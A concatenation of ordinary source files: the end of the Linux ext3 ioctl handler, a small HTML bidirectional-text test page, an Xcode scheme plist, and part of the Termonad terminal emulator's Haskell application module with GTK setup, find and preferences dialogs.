* This is racy - by the time we're woken up and running,
* the superblock could be released. And the module could
* have been unloaded. So sue me.
*
* Returns 1 if it slept, else zero.
*/
{
struct super_block *sb = inode->i_sb;
DECLARE_WAITQUEUE(wait, current);
int ret = 0;
set_current_state(TASK_INTERRUPTIBLE);
add_wait_queue(&EXT3_SB(sb)->ro_wait_queue, &wait);
if (timer_pending(&EXT3_SB(sb)->turn_ro_timer)) {
schedule();
ret = 1;
}
remove_wait_queue(&EXT3_SB(sb)->ro_wait_queue, &wait);
return ret;
}
#endif
case EXT3_IOC_GETRSVSZ:
if (test_opt(inode->i_sb, RESERVATION)
&& S_ISREG(inode->i_mode)
&& ei->i_block_alloc_info) {
rsv_window_size = ei->i_block_alloc_info->rsv_window_node.rsv_goal_size;
return put_user(rsv_window_size, (int __user *)arg);
}
return -ENOTTY;
case EXT3_IOC_SETRSVSZ: {
int err;
if (!test_opt(inode->i_sb, RESERVATION) ||!S_ISREG(inode->i_mode))
return -ENOTTY;
err = mnt_want_write(filp->f_path.mnt);
if (err)
return err;
if (!is_owner_or_cap(inode)) {
err = -EACCES;
goto setrsvsz_out;
}
if (get_user(rsv_window_size, (int __user *)arg)) {
err = -EFAULT;
goto setrsvsz_out;
}
if (rsv_window_size > EXT3_MAX_RESERVE_BLOCKS)
rsv_window_size = EXT3_MAX_RESERVE_BLOCKS;
/*
* need to allocate reservation structure for this inode
* before set the window size
*/
mutex_lock(&ei->truncate_mutex);
if (!ei->i_block_alloc_info)
ext3_init_block_alloc_info(inode);
if (ei->i_block_alloc_info){
struct ext3_reserve_window_node *rsv = &ei->i_block_alloc_info->rsv_window_node;
rsv->rsv_goal_size = rsv_window_size;
}
mutex_unlock(&ei->truncate_mutex);
setrsvsz_out:
mnt_drop_write(filp->f_path.mnt);
return err;
}
case EXT3_IOC_GROUP_EXTEND: {
ext3_fsblk_t n_blocks_count;
struct super_block *sb = inode->i_sb;
int err, err2;
if (!capable(CAP_SYS_RESOURCE))
return -EPERM;
err = mnt_want_write(filp->f_path.mnt);
if (err)
return err;
if (get_user(n_blocks_count, (__u32 __user *)arg)) {
err = -EFAULT;
goto group_extend_out;
}
err = ext3_group_extend(sb, EXT3_SB(sb)->s_es, n_blocks_count);
journal_lock_updates(EXT3_SB(sb)->s_journal);
err2 = journal_flush(EXT3_SB(sb)->s_journal);
journal_unlock_updates(EXT3_SB(sb)->s_journal);
if (err == 0)
err = err2;
group_extend_out:
mnt_drop_write(filp->f_path.mnt);
return err;
}
case EXT3_IOC_GROUP_ADD: {
struct ext3_new_group_data input;
struct super_block *sb = inode->i_sb;
int err, err2;
if (!capable(CAP_SYS_RESOURCE))
return -EPERM;
err = mnt_want_write(filp->f_path.mnt);
if (err)
return err;
if (copy_from_user(&input, (struct ext3_new_group_input __user *)arg,
sizeof(input))) {
err = -EFAULT;
goto group_add_out;
}
err = ext3_group_add(sb, &input);
journal_lock_updates(EXT3_SB(sb)->s_journal);
err2 = journal_flush(EXT3_SB(sb)->s_journal);
journal_unlock_updates(EXT3_SB(sb)->s_journal);
if (err == 0)
err = err2;
group_add_out:
mnt_drop_write(filp->f_path.mnt);
return err;
}
default:
return -ENOTTY;
}
}
#ifdef CONFIG_COMPAT
long ext3_compat_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
/* These are just misnamed, they actually get/put from/to user an int */
switch (cmd) {
case EXT3_IOC32_GETFLAGS:
cmd = EXT3_IOC_GETFLAGS;
break;
case EXT3_IOC32_SETFLAGS:
cmd = EXT3_IOC_SETFLAGS;
break;
case EXT3_IOC32_GETVERSION:
cmd = EXT3_IOC_GETVERSION;
break;
case EXT3_IOC32_SETVERSION:
cmd = EXT3_IOC_SETVERSION;
break;
case EXT3_IOC32_GROUP_EXTEND:
cmd = EXT3_IOC_GROUP_EXTEND;
break;
case EXT3_IOC32_GETVERSION_OLD:
cmd = EXT3_IOC_GETVERSION_OLD;
break;
case EXT3_IOC32_SETVERSION_OLD:
cmd = EXT3_IOC_SETVERSION_OLD;
break;
#ifdef CONFIG_JBD_DEBUG
case EXT3_IOC32_WAIT_FOR_READONLY:
cmd = EXT3_IOC_WAIT_FOR_READONLY;
break;
#endif
case EXT3_IOC32_GETRSVSZ:
cmd = EXT3_IOC_GETRSVSZ;
break;
case EXT3_IOC32_SETRSVSZ:
cmd = EXT3_IOC_SETRSVSZ;
break;
case EXT3_IOC_GROUP_ADD:
break;
default:
return -ENOIOCTLCMD;
}
return ext3_ioctl(file, cmd, (unsigned long) compat_ptr(arg));
}
#endif
| {
"pile_set_name": "Github"
} |
<!DOCTYPE HTML>
<html>
<head>
<meta charset="utf-8">
<title>Set and unset dir="auto"</title>
<script type="text/javascript" src="setDir.js"></script>
<style>
textarea { resize: none; }
</style>
</head>
<body onload="setAllDir('foopy')">
<div><input type="text" value="אבג ABC" id="set0"></div>
<div><span id="set1">אבג ABC</span></div>
<div><textarea id="set2">אבג ABC</textarea></div>
<div><button id="set3">אבג ABC</button></div>
<div><bdi id="set4">אבג ABC</bdi></div>
</body>
</html>
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>SchemeUserState</key>
<dict>
<key>AudioQueueRecorder.xcscheme</key>
<dict>
<key>orderHint</key>
<integer>0</integer>
</dict>
</dict>
<key>SuppressBuildableAutocreation</key>
<dict>
<key>2B934BA41B90B9A000C55A59</key>
<dict>
<key>primary</key>
<true/>
</dict>
</dict>
</dict>
</plist>
| {
"pile_set_name": "Github"
} |
{-# LANGUAGE ForeignFunctionInterface #-}
module Termonad.App where
import Termonad.Prelude
import Config.Dyre (defaultParams, projectName, realMain, showError, wrapMain)
import Control.Lens ((.~), (^.), (^..), over, set, view)
import Control.Monad.Fail (fail)
import Data.FocusList (focusList, moveFromToFL, updateFocusFL)
import Data.Sequence (findIndexR)
import GI.Gdk (castTo, managedForeignPtr, screenGetDefault)
import GI.Gio
( ApplicationFlags(ApplicationFlagsFlagsNone)
, MenuModel(MenuModel)
, actionMapAddAction
, applicationQuit
, applicationRun
, onApplicationActivate
, onApplicationStartup
, onSimpleActionActivate
, simpleActionNew
)
import GI.Gtk
( Application
, ApplicationWindow(ApplicationWindow)
, Box(Box)
, CheckButton(CheckButton)
, ComboBoxText(ComboBoxText)
, Dialog(Dialog)
, Entry(Entry)
, FontButton(FontButton)
, Label(Label)
, PolicyType(PolicyTypeAutomatic)
, PositionType(PositionTypeRight)
, ResponseType(ResponseTypeAccept, ResponseTypeNo, ResponseTypeYes)
, ScrolledWindow(ScrolledWindow)
, SpinButton(SpinButton)
, pattern STYLE_PROVIDER_PRIORITY_APPLICATION
, aboutDialogNew
, adjustmentNew
, applicationAddWindow
, applicationGetActiveWindow
, applicationSetAccelsForAction
, applicationSetMenubar
, applicationWindowSetShowMenubar
, boxPackStart
, builderNewFromString
, builderSetApplication
, comboBoxGetActiveId
, comboBoxSetActiveId
, comboBoxTextAppend
, containerAdd
, cssProviderLoadFromData
, cssProviderNew
, dialogAddButton
, dialogGetContentArea
, dialogNew
, dialogResponse
, dialogRun
, entryBufferGetText
, entryBufferSetText
, entryGetText
, entryNew
, fontChooserSetFontDesc
, fontChooserGetFontDesc
, getEntryBuffer
, gridAttachNextTo
, gridNew
, labelNew
, notebookGetNPages
, notebookNew
, notebookSetShowBorder
, onEntryActivate
, onNotebookPageRemoved
, onNotebookPageReordered
, onNotebookSwitchPage
, onWidgetDeleteEvent
, scrolledWindowSetPolicy
, setWidgetMargin
, spinButtonGetValueAsInt
, spinButtonSetAdjustment
, spinButtonSetValue
, styleContextAddProviderForScreen
, toggleButtonGetActive
, toggleButtonSetActive
, widgetDestroy
, widgetGrabFocus
, widgetSetCanFocus
, widgetSetVisible
, widgetShow
, widgetShowAll
, windowPresent
, windowSetDefaultIconFromFile
, windowSetTitle
, windowSetTransientFor
)
import qualified GI.Gtk as Gtk
import GI.Pango
( FontDescription
, pattern SCALE
, fontDescriptionGetFamily
, fontDescriptionGetSize
, fontDescriptionGetSizeIsAbsolute
, fontDescriptionNew
, fontDescriptionSetFamily
, fontDescriptionSetSize
, fontDescriptionSetAbsoluteSize
)
import GI.Vte
( CursorBlinkMode(..)
, catchRegexError
, regexNewForSearch
, terminalCopyClipboard
, terminalPasteClipboard
, terminalSearchFindNext
, terminalSearchFindPrevious
, terminalSearchSetRegex
, terminalSearchSetWrapAround
, terminalSetCursorBlinkMode
, terminalSetFont
, terminalSetScrollbackLines
, terminalSetWordCharExceptions
)
import System.Environment (getExecutablePath)
import System.FilePath (takeFileName)
import Paths_termonad (getDataFileName)
import Termonad.Gtk (appNew, objFromBuildUnsafe)
import Termonad.Keys (handleKeyPress)
import Termonad.Lenses
( lensConfirmExit
, lensCursorBlinkMode
, lensFontConfig
, lensOptions
, lensShowMenu
, lensShowScrollbar
, lensShowTabBar
, lensScrollbackLen
, lensTMNotebook
, lensTMNotebookTabTermContainer
, lensTMNotebookTabs
, lensTMNotebookTabTerm
, lensTMStateApp
, lensTMStateAppWin
, lensTMStateConfig
, lensTMStateFontDesc
, lensTMStateNotebook
, lensTerm
, lensWordCharExceptions
)
import Termonad.PreferencesFile (saveToPreferencesFile)
import Termonad.Term
( createTerm
, relabelTabs
, termExitFocused
, setShowTabs
, showScrollbarToPolicy
)
import Termonad.Types
( FontConfig(..)
, FontSize(FontSizePoints, FontSizeUnits)
, ShowScrollbar(..)
, ShowTabBar(..)
, TMConfig
, TMNotebookTab
, TMState
, TMState'(TMState)
, getFocusedTermFromState
, modFontSize
, newEmptyTMState
, tmNotebookTabTermContainer
, tmNotebookTabs
, tmStateApp
, tmStateNotebook
)
import Termonad.XML (interfaceText, menuText, preferencesText)
setupScreenStyle :: IO ()
setupScreenStyle = do
maybeScreen <- screenGetDefault
case maybeScreen of
Nothing -> pure ()
Just screen -> do
cssProvider <- cssProviderNew
let (textLines :: [Text]) =
[
"scrollbar {"
-- , " -GtkRange-slider-width: 200px;"
-- , " -GtkRange-stepper-size: 200px;"
-- , " border-width: 200px;"
, " background-color: #aaaaaa;"
-- , " color: #ff0000;"
-- , " min-width: 4px;"
, "}"
-- , "scrollbar trough {"
-- , " -GtkRange-slider-width: 200px;"
-- , " -GtkRange-stepper-size: 200px;"
-- , " border-width: 200px;"
-- , " background-color: #00ff00;"
-- , " color: #00ff00;"
-- , " min-width: 50px;"
-- , "}"
-- , "scrollbar slider {"
-- , " -GtkRange-slider-width: 200px;"
-- , " -GtkRange-stepper-size: 200px;"
-- , " border-width: 200px;"
-- , " background-color: #0000ff;"
-- , " color: #0000ff;"
-- , " min-width: 50px;"
-- , "}"
, "tab {"
, " background-color: transparent;"
, "}"
]
let styleData = encodeUtf8 (unlines textLines :: Text)
cssProviderLoadFromData cssProvider styleData
styleContextAddProviderForScreen
screen
cssProvider
(fromIntegral STYLE_PROVIDER_PRIORITY_APPLICATION)
createFontDescFromConfig :: TMConfig -> IO FontDescription
createFontDescFromConfig tmConfig = do
let fontConf = tmConfig ^. lensOptions . lensFontConfig
createFontDesc (fontSize fontConf) (fontFamily fontConf)
createFontDesc :: FontSize -> Text -> IO FontDescription
createFontDesc fontSz fontFam = do
fontDesc <- fontDescriptionNew
fontDescriptionSetFamily fontDesc fontFam
setFontDescSize fontDesc fontSz
pure fontDesc
setFontDescSize :: FontDescription -> FontSize -> IO ()
setFontDescSize fontDesc (FontSizePoints points) =
fontDescriptionSetSize fontDesc $ fromIntegral (points * fromIntegral SCALE)
setFontDescSize fontDesc (FontSizeUnits units) =
fontDescriptionSetAbsoluteSize fontDesc $ units * fromIntegral SCALE
adjustFontDescSize :: (FontSize -> FontSize) -> FontDescription -> IO ()
adjustFontDescSize f fontDesc = do
currFontSz <- fontSizeFromFontDescription fontDesc
let newFontSz = f currFontSz
setFontDescSize fontDesc newFontSz
modifyFontSizeForAllTerms :: (FontSize -> FontSize) -> TMState -> IO ()
modifyFontSizeForAllTerms modFontSizeFunc mvarTMState = do
tmState <- readMVar mvarTMState
let fontDesc = tmState ^. lensTMStateFontDesc
adjustFontDescSize modFontSizeFunc fontDesc
let terms =
tmState ^..
lensTMStateNotebook .
lensTMNotebookTabs .
traverse .
lensTMNotebookTabTerm .
lensTerm
foldMap (\vteTerm -> terminalSetFont vteTerm (Just fontDesc)) terms
fontSizeFromFontDescription :: FontDescription -> IO FontSize
fontSizeFromFontDescription fontDesc = do
currSize <- fontDescriptionGetSize fontDesc
currAbsolute <- fontDescriptionGetSizeIsAbsolute fontDesc
return $ if currAbsolute
then FontSizeUnits $ fromIntegral currSize / fromIntegral SCALE
else
let fontRatio :: Double = fromIntegral currSize / fromIntegral SCALE
in FontSizePoints $ round fontRatio
fontConfigFromFontDescription :: FontDescription -> IO (Maybe FontConfig)
fontConfigFromFontDescription fontDescription = do
fontSize <- fontSizeFromFontDescription fontDescription
maybeFontFamily <- fontDescriptionGetFamily fontDescription
return $ (`FontConfig` fontSize) <$> maybeFontFamily
compareScrolledWinAndTab :: ScrolledWindow -> TMNotebookTab -> Bool
compareScrolledWinAndTab scrollWin flTab =
let ScrolledWindow managedPtrFLTab = tmNotebookTabTermContainer flTab
foreignPtrFLTab = managedForeignPtr managedPtrFLTab
ScrolledWindow managedPtrScrollWin = scrollWin
foreignPtrScrollWin = managedForeignPtr managedPtrScrollWin
in foreignPtrFLTab == foreignPtrScrollWin
updateFLTabPos :: TMState -> Int -> Int -> IO ()
updateFLTabPos mvarTMState oldPos newPos =
modifyMVar_ mvarTMState $ \tmState -> do
let tabs = tmState ^. lensTMStateNotebook . lensTMNotebookTabs
maybeNewTabs = moveFromToFL oldPos newPos tabs
case maybeNewTabs of
Nothing -> do
putStrLn $
"in updateFLTabPos, Strange error: couldn't move tabs.\n" <>
"old pos: " <> tshow oldPos <> "\n" <>
"new pos: " <> tshow newPos <> "\n" <>
"tabs: " <> tshow tabs <> "\n" <>
"maybeNewTabs: " <> tshow maybeNewTabs <> "\n" <>
"tmState: " <> tshow tmState
pure tmState
Just newTabs ->
pure $
tmState &
lensTMStateNotebook . lensTMNotebookTabs .~ newTabs
-- | Try to figure out whether Termonad should exit. This also used to figure
-- out if Termonad should close a given terminal.
--
-- This reads the 'confirmExit' setting from 'ConfigOptions' to check whether
-- the user wants to be notified when either Termonad or a given terminal is
-- about to be closed.
--
-- If 'confirmExit' is 'True', then a dialog is presented to the user asking
-- them if they really want to exit or close the terminal. Their response is
-- sent back as a 'ResponseType'.
--
-- If 'confirmExit' is 'False', then this function always returns
-- 'ResponseTypeYes'.
askShouldExit :: TMState -> IO ResponseType
askShouldExit mvarTMState = do
tmState <- readMVar mvarTMState
let confirm = tmState ^. lensTMStateConfig . lensOptions . lensConfirmExit
if confirm
then confirmationDialogForExit tmState
else pure ResponseTypeYes
where
-- Show the user a dialog telling them there are still terminals running and
-- asking if they really want to exit.
--
-- Return the user's resposne as a 'ResponseType'.
confirmationDialogForExit :: TMState' -> IO ResponseType
confirmationDialogForExit tmState = do
let app = tmState ^. lensTMStateApp
win <- applicationGetActiveWindow app
dialog <- dialogNew
box <- dialogGetContentArea dialog
label <-
labelNew $
Just
"There are still terminals running. Are you sure you want to exit?"
containerAdd box label
widgetShow label
setWidgetMargin label 10
void $
dialogAddButton
dialog
"No, do NOT exit"
(fromIntegral (fromEnum ResponseTypeNo))
void $
dialogAddButton
dialog
"Yes, exit"
(fromIntegral (fromEnum ResponseTypeYes))
windowSetTransientFor dialog win
res <- dialogRun dialog
widgetDestroy dialog
pure $ toEnum (fromIntegral res)
-- | Force Termonad to exit without asking the user whether or not to do so.
forceQuit :: TMState -> IO ()
forceQuit mvarTMState = do
tmState <- readMVar mvarTMState
let app = tmState ^. lensTMStateApp
applicationQuit app
setupTermonad :: TMConfig -> Application -> ApplicationWindow -> Gtk.Builder -> IO ()
setupTermonad tmConfig app win builder = do
termonadIconPath <- getDataFileName "img/termonad-lambda.png"
windowSetDefaultIconFromFile termonadIconPath
setupScreenStyle
box <- objFromBuildUnsafe builder "content_box" Box
fontDesc <- createFontDescFromConfig tmConfig
note <- notebookNew
widgetSetCanFocus note False
-- If this is not set to False, then there will be a one pixel white border
-- shown around the notebook.
notebookSetShowBorder note False
boxPackStart box note True True 0
mvarTMState <- newEmptyTMState tmConfig app win note fontDesc
terminal <- createTerm handleKeyPress mvarTMState
void $ onNotebookPageRemoved note $ \_ _ -> do
pages <- notebookGetNPages note
if pages == 0
then forceQuit mvarTMState
else setShowTabs tmConfig note
void $ onNotebookSwitchPage note $ \_ pageNum -> do
modifyMVar_ mvarTMState $ \tmState -> do
let notebook = tmStateNotebook tmState
tabs = tmNotebookTabs notebook
maybeNewTabs = updateFocusFL (fromIntegral pageNum) tabs
case maybeNewTabs of
Nothing -> pure tmState
Just (tab, newTabs) -> do
widgetGrabFocus $ tab ^. lensTMNotebookTabTerm . lensTerm
pure $
tmState &
lensTMStateNotebook . lensTMNotebookTabs .~ newTabs
void $ onNotebookPageReordered note $ \childWidg pageNum -> do
maybeScrollWin <- castTo ScrolledWindow childWidg
case maybeScrollWin of
Nothing ->
fail $
"In setupTermonad, in callback for onNotebookPageReordered, " <>
"child widget is not a ScrolledWindow.\n" <>
"Don't know how to continue.\n"
Just scrollWin -> do
TMState{tmStateNotebook} <- readMVar mvarTMState
let fl = tmStateNotebook ^. lensTMNotebookTabs
let maybeOldPosition =
findIndexR (compareScrolledWinAndTab scrollWin) (focusList fl)
case maybeOldPosition of
Nothing ->
fail $
"In setupTermonad, in callback for onNotebookPageReordered, " <>
"the ScrolledWindow is not already in the FocusList.\n" <>
"Don't know how to continue.\n"
Just oldPos -> do
updateFLTabPos mvarTMState oldPos (fromIntegral pageNum)
relabelTabs mvarTMState
newTabAction <- simpleActionNew "newtab" Nothing
void $ onSimpleActionActivate newTabAction $ \_ -> void $ createTerm handleKeyPress mvarTMState
actionMapAddAction app newTabAction
applicationSetAccelsForAction app "app.newtab" ["<Shift><Ctrl>T"]
closeTabAction <- simpleActionNew "closetab" Nothing
void $ onSimpleActionActivate closeTabAction $ \_ ->
termExitFocused mvarTMState
actionMapAddAction app closeTabAction
applicationSetAccelsForAction app "app.closetab" ["<Shift><Ctrl>W"]
quitAction <- simpleActionNew "quit" Nothing
void $ onSimpleActionActivate quitAction $ \_ -> do
shouldExit <- askShouldExit mvarTMState
when (shouldExit == ResponseTypeYes) $ forceQuit mvarTMState
actionMapAddAction app quitAction
applicationSetAccelsForAction app "app.quit" ["<Shift><Ctrl>Q"]
copyAction <- simpleActionNew "copy" Nothing
void $ onSimpleActionActivate copyAction $ \_ -> do
maybeTerm <- getFocusedTermFromState mvarTMState
maybe (pure ()) terminalCopyClipboard maybeTerm
actionMapAddAction app copyAction
applicationSetAccelsForAction app "app.copy" ["<Shift><Ctrl>C"]
pasteAction <- simpleActionNew "paste" Nothing
void $ onSimpleActionActivate pasteAction $ \_ -> do
maybeTerm <- getFocusedTermFromState mvarTMState
maybe (pure ()) terminalPasteClipboard maybeTerm
actionMapAddAction app pasteAction
applicationSetAccelsForAction app "app.paste" ["<Shift><Ctrl>V"]
preferencesAction <- simpleActionNew "preferences" Nothing
void $ onSimpleActionActivate preferencesAction (const $ showPreferencesDialog mvarTMState)
actionMapAddAction app preferencesAction
enlargeFontAction <- simpleActionNew "enlargefont" Nothing
void $ onSimpleActionActivate enlargeFontAction $ \_ ->
modifyFontSizeForAllTerms (modFontSize 1) mvarTMState
actionMapAddAction app enlargeFontAction
applicationSetAccelsForAction app "app.enlargefont" ["<Ctrl>plus"]
reduceFontAction <- simpleActionNew "reducefont" Nothing
void $ onSimpleActionActivate reduceFontAction $ \_ ->
modifyFontSizeForAllTerms (modFontSize (-1)) mvarTMState
actionMapAddAction app reduceFontAction
applicationSetAccelsForAction app "app.reducefont" ["<Ctrl>minus"]
findAction <- simpleActionNew "find" Nothing
void $ onSimpleActionActivate findAction $ \_ -> doFind mvarTMState
actionMapAddAction app findAction
applicationSetAccelsForAction app "app.find" ["<Shift><Ctrl>F"]
findAboveAction <- simpleActionNew "findabove" Nothing
void $ onSimpleActionActivate findAboveAction $ \_ -> findAbove mvarTMState
actionMapAddAction app findAboveAction
applicationSetAccelsForAction app "app.findabove" ["<Shift><Ctrl>P"]
findBelowAction <- simpleActionNew "findbelow" Nothing
void $ onSimpleActionActivate findBelowAction $ \_ -> findBelow mvarTMState
actionMapAddAction app findBelowAction
applicationSetAccelsForAction app "app.findbelow" ["<Shift><Ctrl>I"]
aboutAction <- simpleActionNew "about" Nothing
void $ onSimpleActionActivate aboutAction $ \_ -> showAboutDialog app
actionMapAddAction app aboutAction
menuBuilder <- builderNewFromString menuText $ fromIntegral (length menuText)
menuModel <- objFromBuildUnsafe menuBuilder "menubar" MenuModel
applicationSetMenubar app (Just menuModel)
let showMenu = tmConfig ^. lensOptions . lensShowMenu
applicationWindowSetShowMenubar win showMenu
windowSetTitle win "Termonad"
-- This event will happen if the user requests that the top-level Termonad
-- window be closed through their window manager. It will also happen
-- normally when the user tries to close Termonad through normal methods,
-- like clicking "Quit" or closing the last open terminal.
--
-- If you return 'True' from this callback, then Termonad will not exit.
-- If you return 'False' from this callback, then Termonad will continue to
-- exit.
void $ onWidgetDeleteEvent win $ \_ -> do
shouldExit <- askShouldExit mvarTMState
pure $
case shouldExit of
ResponseTypeYes -> False
_ -> True
widgetShowAll win
widgetGrabFocus $ terminal ^. lensTerm
appActivate :: TMConfig -> Application -> IO ()
appActivate tmConfig app = do
uiBuilder <-
builderNewFromString interfaceText $ fromIntegral (length interfaceText)
builderSetApplication uiBuilder app
appWin <- objFromBuildUnsafe uiBuilder "appWin" ApplicationWindow
applicationAddWindow app appWin
setupTermonad tmConfig app appWin uiBuilder
windowPresent appWin
showAboutDialog :: Application -> IO ()
showAboutDialog app = do
win <- applicationGetActiveWindow app
aboutDialog <- aboutDialogNew
windowSetTransientFor aboutDialog win
void $ dialogRun aboutDialog
widgetDestroy aboutDialog
showFindDialog :: Application -> IO (Maybe Text)
showFindDialog app = do
win <- applicationGetActiveWindow app
dialog <- dialogNew
box <- dialogGetContentArea dialog
grid <- gridNew
searchForLabel <- labelNew (Just "Search for regex:")
containerAdd grid searchForLabel
widgetShow searchForLabel
setWidgetMargin searchForLabel 10
searchEntry <- entryNew
gridAttachNextTo grid searchEntry (Just searchForLabel) PositionTypeRight 1 1
widgetShow searchEntry
setWidgetMargin searchEntry 10
-- setWidgetMarginBottom searchEntry 20
void $
onEntryActivate searchEntry $
dialogResponse dialog (fromIntegral (fromEnum ResponseTypeYes))
void $
dialogAddButton
dialog
"Close"
(fromIntegral (fromEnum ResponseTypeNo))
void $
dialogAddButton
dialog
"Find"
(fromIntegral (fromEnum ResponseTypeYes))
containerAdd box grid
widgetShow grid
windowSetTransientFor dialog win
res <- dialogRun dialog
searchString <- entryGetText searchEntry
let maybeSearchString =
case toEnum (fromIntegral res) of
ResponseTypeYes -> Just searchString
_ -> Nothing
widgetDestroy dialog
pure maybeSearchString
doFind :: TMState -> IO ()
doFind mvarTMState = do
tmState <- readMVar mvarTMState
let app = tmStateApp tmState
maybeSearchString <- showFindDialog app
-- putStrLn $ "trying to find: " <> tshow maybeSearchString
maybeTerminal <- getFocusedTermFromState mvarTMState
case (maybeSearchString, maybeTerminal) of
(Just searchString, Just terminal) -> do
-- TODO: Figure out how to import the correct pcre flags.
--
-- If you don't pass the pcre2Multiline flag, VTE gives
-- the following warning:
--
-- (termonad-linux-x86_64:18792): Vte-WARNING **:
-- 21:56:31.193: (vtegtk.cc:2269):void
-- vte_terminal_search_set_regex(VteTerminal*,
-- VteRegex*, guint32): runtime check failed:
-- (regex == nullptr ||
-- _vte_regex_get_compile_flags(regex) & PCRE2_MULTILINE)
--
-- However, if you do add the pcre2Multiline flag,
-- the terminalSearchSetRegex appears to just completely
-- not work.
let pcreFlags = 0
let newRegex =
regexNewForSearch
searchString
(fromIntegral $ length searchString)
pcreFlags
eitherRegex <-
catchRegexError
(fmap Right newRegex)
(\_ errMsg -> pure (Left errMsg))
case eitherRegex of
Left errMsg -> do
let msg = "error when creating regex: " <> errMsg
hPutStrLn stderr msg
Right regex -> do
terminalSearchSetRegex terminal (Just regex) pcreFlags
terminalSearchSetWrapAround terminal True
_matchFound <- terminalSearchFindPrevious terminal
-- TODO: Setup an actual logging framework to show these
-- kinds of log messages. Also make a similar change in
-- findAbove and findBelow.
-- putStrLn $ "was match found: " <> tshow matchFound
pure ()
_ -> pure ()
findAbove :: TMState -> IO ()
findAbove mvarTMState = do
maybeTerminal <- getFocusedTermFromState mvarTMState
case maybeTerminal of
Nothing -> pure ()
Just terminal -> do
_matchFound <- terminalSearchFindPrevious terminal
-- putStrLn $ "was match found: " <> tshow matchFound
pure ()
findBelow :: TMState -> IO ()
findBelow mvarTMState = do
maybeTerminal <- getFocusedTermFromState mvarTMState
case maybeTerminal of
Nothing -> pure ()
Just terminal -> do
_matchFound <- terminalSearchFindNext terminal
-- putStrLn $ "was match found: " <> tshow matchFound
pure ()
setShowMenuBar :: Application -> Bool -> IO ()
setShowMenuBar app visible = do
void $ runMaybeT $ do
win <- MaybeT $ applicationGetActiveWindow app
appWin <- MaybeT $ castTo ApplicationWindow win
lift $ applicationWindowSetShowMenubar appWin visible
-- | Fill a combo box with ids and labels
--
-- The ids are stored in the combobox as 'Text', so their type should be an
-- instance of the 'Show' type class.
comboBoxFill :: forall a. Show a => ComboBoxText -> [(a, Text)] -> IO ()
comboBoxFill comboBox = mapM_ go
where
go :: (a, Text) -> IO ()
go (value, textId) =
comboBoxTextAppend comboBox (Just $ tshow value) textId
-- | Set the current active item in a combobox given an input id.
comboBoxSetActive :: Show a => ComboBoxText -> a -> IO ()
comboBoxSetActive cb item = void $ comboBoxSetActiveId cb (Just $ tshow item)
-- | Get the current active item in a combobox
--
-- The list of values to be searched in the combobox must be given as a
-- parameter. These values are converted to Text then compared to the current
-- id.
comboBoxGetActive
:: forall a. (Show a, Enum a) => ComboBoxText -> [a] -> IO (Maybe a)
comboBoxGetActive cb values = findEnumFromMaybeId <$> comboBoxGetActiveId cb
where
findEnumFromMaybeId :: Maybe Text -> Maybe a
findEnumFromMaybeId maybeId = maybeId >>= findEnumFromId
findEnumFromId :: Text -> Maybe a
findEnumFromId label = find (\x -> tshow x == label) values
applyNewPreferences :: TMState -> IO ()
applyNewPreferences mvarTMState = do
tmState <- readMVar mvarTMState
let appWin = tmState ^. lensTMStateAppWin
config = tmState ^. lensTMStateConfig
notebook = tmState ^. lensTMStateNotebook ^. lensTMNotebook
tabFocusList = tmState ^. lensTMStateNotebook ^. lensTMNotebookTabs
showMenu = config ^. lensOptions ^. lensShowMenu
applicationWindowSetShowMenubar appWin showMenu
setShowTabs config notebook
-- Sets the remaining preferences to each tab
foldMap (applyNewPreferencesToTab mvarTMState) tabFocusList
applyNewPreferencesToTab :: TMState -> TMNotebookTab -> IO ()
applyNewPreferencesToTab mvarTMState tab = do
tmState <- readMVar mvarTMState
let fontDesc = tmState ^. lensTMStateFontDesc
term = tab ^. lensTMNotebookTabTerm ^. lensTerm
scrolledWin = tab ^. lensTMNotebookTabTermContainer
options = tmState ^. lensTMStateConfig ^. lensOptions
terminalSetFont term (Just fontDesc)
terminalSetCursorBlinkMode term (options ^. lensCursorBlinkMode)
terminalSetWordCharExceptions term (options ^. lensWordCharExceptions)
terminalSetScrollbackLines term (fromIntegral (options ^. lensScrollbackLen))
let vScrollbarPolicy = showScrollbarToPolicy (options ^. lensShowScrollbar)
scrolledWindowSetPolicy scrolledWin PolicyTypeAutomatic vScrollbarPolicy
-- | Show the preferences dialog.
--
-- When the user clicks on the Ok button, it copies the new settings to TMState.
-- Then apply them to the current terminals.
showPreferencesDialog :: TMState -> IO ()
showPreferencesDialog mvarTMState = do
-- Get app out of mvar
tmState <- readMVar mvarTMState
let app = tmState ^. lensTMStateApp
-- Create the preference dialog and get some widgets
preferencesBuilder <-
builderNewFromString preferencesText $ fromIntegral (length preferencesText)
preferencesDialog <-
objFromBuildUnsafe preferencesBuilder "preferences" Dialog
confirmExitCheckButton <-
objFromBuildUnsafe preferencesBuilder "confirmExit" CheckButton
showMenuCheckButton <-
objFromBuildUnsafe preferencesBuilder "showMenu" CheckButton
wordCharExceptionsEntryBuffer <-
objFromBuildUnsafe preferencesBuilder "wordCharExceptions" Entry >>=
getEntryBuffer
fontButton <- objFromBuildUnsafe preferencesBuilder "font" FontButton
showScrollbarComboBoxText <-
objFromBuildUnsafe preferencesBuilder "showScrollbar" ComboBoxText
comboBoxFill
showScrollbarComboBoxText
[ (ShowScrollbarNever, "Never")
, (ShowScrollbarAlways, "Always")
, (ShowScrollbarIfNeeded, "If needed")
]
showTabBarComboBoxText <-
objFromBuildUnsafe preferencesBuilder "showTabBar" ComboBoxText
comboBoxFill
showTabBarComboBoxText
[ (ShowTabBarNever, "Never")
, (ShowTabBarAlways, "Always")
, (ShowTabBarIfNeeded, "If needed")
]
cursorBlinkModeComboBoxText <-
objFromBuildUnsafe preferencesBuilder "cursorBlinkMode" ComboBoxText
comboBoxFill
cursorBlinkModeComboBoxText
[ (CursorBlinkModeSystem, "System")
, (CursorBlinkModeOn, "On")
, (CursorBlinkModeOff, "Off")
]
scrollbackLenSpinButton <-
objFromBuildUnsafe preferencesBuilder "scrollbackLen" SpinButton
adjustmentNew 0 0 (fromIntegral (maxBound :: Int)) 1 10 0 >>=
spinButtonSetAdjustment scrollbackLenSpinButton
warningLabel <- objFromBuildUnsafe preferencesBuilder "warning" Label
-- We show the warning label only if the user has launched termonad with a
-- termonad.hs file
executablePath <- getExecutablePath
